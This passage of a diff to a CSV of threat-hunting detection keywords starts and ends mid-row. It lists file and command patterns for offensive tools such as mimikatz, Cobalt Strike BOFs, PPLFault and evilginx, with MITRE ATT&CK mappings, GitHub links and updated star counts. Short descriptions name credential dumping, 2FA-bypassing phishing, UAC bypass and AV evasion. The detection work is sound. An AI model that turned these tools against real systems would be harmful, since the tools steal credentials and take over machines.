TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*evasion/has_recycle_bin.*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" -"*evasion_shellcode.js*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*event::clear*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*event::drop*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*evasion_shellcode.js*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*event::clear*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*event::drop*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*EventAggregation.dll.bak*","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","1","N/A","N/A","2","115","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z" -"*EventAggregation.dll.bak*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","410","66","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" -"*EventAggregation.dll.patched*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","410","66","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" -"*EventAggregationPH.dll*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified 
process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","410","66","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*EventAggregation.dll.bak*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*EventAggregation.dll.patched*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*EventAggregationPH.dll*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" "*eventlog -risk-i-know*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" 
"*eventlog_fucker.py*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" "*eventspy.cna*","offensive_tool_keyword","cobaltstrike","Bloodhound Attack Path Automation in CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/vysecurity/ANGRYPUPPY","1","1","N/A","10","10","300","93","2020-04-26T17:35:31Z","2017-07-11T14:18:07Z" 
@@ -9949,36 +10098,36 @@ "*EventViewerUAC.x64*","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","1","N/A","10","10","104","33","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z" "*EventViewerUAC.x86*","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - 
T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","1","N/A","10","10","104","33","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z" "*EventViewerUAC_BOF*","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/EventViewerUAC_BOF","1","1","N/A","10","10","130","29","2022-05-06T17:43:05Z","2022-05-02T02:08:52Z" -"*eventvwr_elevator*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon 
payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","812","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" -"*-EventVwrBypass*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1118","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*eventvwr_elevator*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - 
T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" +"*-EventVwrBypass*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1118","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - 
Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*evilclippy *","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*EvilClippy.exe*","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","1","N/A","10","10","1956","381","2022-05-19T23:00:22Z","2019-03-26T12:14:03Z" "*EvilClippy.exe*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*EvilClippyManager.*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*EvilClippy-master*","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","1","N/A","10","10","1956","381","2022-05-19T23:00:22Z","2019-03-26T12:14:03Z" 
"*EvilClippyMenu*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" -"*evilfeed.go*","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","1","N/A","N/A","10","1308","237","2023-09-13T23:44:48Z","2022-09-07T02:47:43Z" -"*evilginx*","offensive_tool_keyword","evilginx","evilginx2 is a man-in-the-middle attack framework used for phishing login credentials along with session cookies. which in turn allows to bypass 2-factor authentication protection.This tool is a successor to Evilginx. released in 2017. which used a custom version of nginx HTTP server to provide man-in-the-middle functionality to act as a proxy between a browser and phished website. Present version is fully written in GO as a standalone application. which implements its own HTTP and DNS server. 
making it extremely easy to set up and use","T1556 - T1565 - T1056 - T1558 - T1110","TA0002 - TA0003 - TA0004 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","1","N/A","N/A","10","8326","1638","2023-09-28T22:51:46Z","2018-07-10T09:59:52Z" -"*evilginx.exe*","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","1","N/A","N/A","10","8326","1638","2023-09-28T22:51:46Z","2018-07-10T09:59:52Z" -"*evilginx2*","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","1","N/A","N/A","10","8326","1638","2023-09-28T22:51:46Z","2018-07-10T09:59:52Z" -"*evilginx-linux*","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","1","N/A","N/A","10","1308","237","2023-09-13T23:44:48Z","2022-09-07T02:47:43Z" -"*evilginx-mastery*","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","1","N/A","N/A","10","8326","1638","2023-09-28T22:51:46Z","2018-07-10T09:59:52Z" -"*evilgophish*","offensive_tool_keyword","gophish","Combination of evilginx2 
and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","1","N/A","N/A","10","1308","237","2023-09-13T23:44:48Z","2022-09-07T02:47:43Z" +"*evilfeed.go*","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","1","N/A","N/A","10","1308","237","2023-10-04T15:18:07Z","2022-09-07T02:47:43Z" +"*evilginx*","offensive_tool_keyword","evilginx","evilginx2 is a man-in-the-middle attack framework used for phishing login credentials along with session cookies. which in turn allows to bypass 2-factor authentication protection.This tool is a successor to Evilginx. released in 2017. which used a custom version of nginx HTTP server to provide man-in-the-middle functionality to act as a proxy between a browser and phished website. Present version is fully written in GO as a standalone application. which implements its own HTTP and DNS server. 
making it extremely easy to set up and use","T1556 - T1565 - T1056 - T1558 - T1110","TA0002 - TA0003 - TA0004 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","1","N/A","N/A","10","8329","1638","2023-09-28T22:51:46Z","2018-07-10T09:59:52Z" +"*evilginx.exe*","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","1","N/A","N/A","10","8329","1638","2023-09-28T22:51:46Z","2018-07-10T09:59:52Z" +"*evilginx2*","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","1","N/A","N/A","10","8329","1638","2023-09-28T22:51:46Z","2018-07-10T09:59:52Z" +"*evilginx-linux*","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","1","N/A","N/A","10","1308","237","2023-10-04T15:18:07Z","2022-09-07T02:47:43Z" +"*evilginx-mastery*","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","1","N/A","N/A","10","8329","1638","2023-09-28T22:51:46Z","2018-07-10T09:59:52Z" +"*evilgophish*","offensive_tool_keyword","gophish","Combination of evilginx2 
